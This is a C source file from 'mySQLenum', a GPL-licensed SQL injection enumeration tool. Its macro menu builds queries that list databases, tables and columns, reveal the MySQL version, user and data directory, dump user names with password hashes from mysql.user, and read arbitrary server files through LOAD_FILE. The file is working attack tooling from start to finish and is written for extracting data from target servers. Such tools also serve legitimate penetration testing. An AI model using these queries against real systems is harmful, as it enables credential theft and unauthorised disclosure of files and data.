/*
 * mySQLenum
 *  
 * Copyright (C) 2009 Andrea Fabrizi <andrea.fabrizi@gmail.com>
 *  
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *  
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *  
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 *
 *
 */
#include <stdio.h>
#include <sys/types.h> 
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <ctype.h>
#include "mysqlenum.h"

/*
 * Macro mode
 */
void macro_mode_start(struct configuration *conf)
{
    int choice,
        macro = 0;
    
    fprintf(stdout, "\n  Available macros:\n"
                     "    0) Test enumeration\n"
                     "    1) Databases enumeration\n"
                     "    2) Tables enumeration\n"
                     "    3) Fields enumeration\n"
                     "    4) MySQL Version\n"
                     "    5) Current User\n"
                     "    6) Current Database\n"
                     "    7) MySQL users and password hashes\n"
                     "    8) View local file\n"
                     "    9) Data directory\n"
                     "\n  Your choice: ");
    
    do
    {
        choice = getchar();
        if ((choice == '\r') || (choice == '\n') ) continue;
        
        switch (choice)
        {
            case '0' : macro_enum_test(conf); macro = 1; break;
            case '1' : macro_enum_db(conf); macro = 1; break;
            case '2' : macro_enum_tables(conf); macro = 1; break;
            case '3' : macro_enum_fields(conf); macro = 1; break;
            case '4' : macro_enum_data(conf, "MySQL Version", "select @@version"); macro = 1; break;
            case '5' : macro_enum_data(conf, "Current User", "select user()"); macro = 1; break;
            case '6' : macro_enum_data(conf, "Current Database", "select database()"); macro = 1; break;
            case '7' : macro_enum_data_all_rows(conf, "MySQL Users and password hashes", "select distinct concat(user,0x20,password) from mysql.user"); macro = 1; break;
            case '8' : macro_enum_file(conf); macro = 1; break;
            case '9' : macro_enum_data(conf, "MySQL data directory", "select @@datadir"); macro = 1; break;
        }
        
    } while (!macro);    

}

/*
 * Enumeration test
 */
void macro_enum_test(struct configuration *conf)
{
    char *query;
    
    fprintf(stdout, "\nTrying to enumerate the string 'T35T!':-> ");
    
    conf->encodestrings = YES;
    query = "select 'T35T!'";
    enum_query(conf, query);
}

/*
 * Enumerates all the databases
 */
void macro_enum_db(struct configuration *conf)
{
    char *query;
    
    fprintf(stdout, "\nDatabases:\n");
    
    asprintf(&query, "select schema_name from information_schema.schemata");
    conf->sqlquery = query;
    enum_query_all_rows(conf);

    free(query); 
}

/*
 * Enumerates all the database tables
 */
void macro_enum_tables(struct configuration *conf)
{
    char *query,
         db_name[64];
    int ret;
    
    conf->encodestrings = YES;
    
    fprintf(stdout, "\nDatabase name: ");
    ret = scanf("%63s", db_name);
    
    fprintf(stdout, "\nTables (%s):\n", db_name);
    
    asprintf(&query, "select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='%s'", db_name);
    conf->sqlquery = query;
    enum_query_all_rows(conf);
           
    free(query); 
}

/*
 * Enumerates all the table fields
 */
void macro_enum_fields(struct configuration *conf)
{
    char *query,
         tbl_name[64],
         db_name[64];
    int ret;
    
    conf->encodestrings = YES;

    fprintf(stdout, "\nDatabase name: ");
    ret = scanf("%63s", db_name);
        
    fprintf(stdout, "Table name: ");
    ret = scanf("%63s", tbl_name);
    
    fprintf(stdout, "\nFields (%s.%s):\n", db_name, tbl_name);

    asprintf(&query, "select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='%s' and TABLE_SCHEMA='%s'",tbl_name, db_name);
    conf->sqlquery = query;
    enum_query_all_rows(conf);

    free(query); 
}

/*
 * Enumerates generic data
 */
void macro_enum_data(struct configuration *conf, const char *title, const char *query)
{
    fprintf(stdout, "\n%s: ", title);
    enum_query(conf, query);
}

/*
 * Enumerates generic data (all rows)
 */
void macro_enum_data_all_rows(struct configuration *conf, const char *title, char *query)
{
    fprintf(stdout, "\n%s:\n", title);
    conf->sqlquery = query;
    enum_query_all_rows(conf);
}

/*
 * Load local file
 */
void macro_enum_file(struct configuration *conf)
{
    char *query,
         file_name[1024];
    int ret;
    
    conf->encodestrings = YES;
    conf->charstart = 0;
    conf->charend = 127;
    nospinner = YES;
    
    fprintf(stdout, "\nFile path: ");
    ret = scanf("%1023s", file_name);
    
    fprintf(stdout, "\nContent:\n\n");
    
    asprintf(&query, "select LOAD_FILE('%s')", file_name);
    enum_query(conf,query);
           
    free(query); 
}

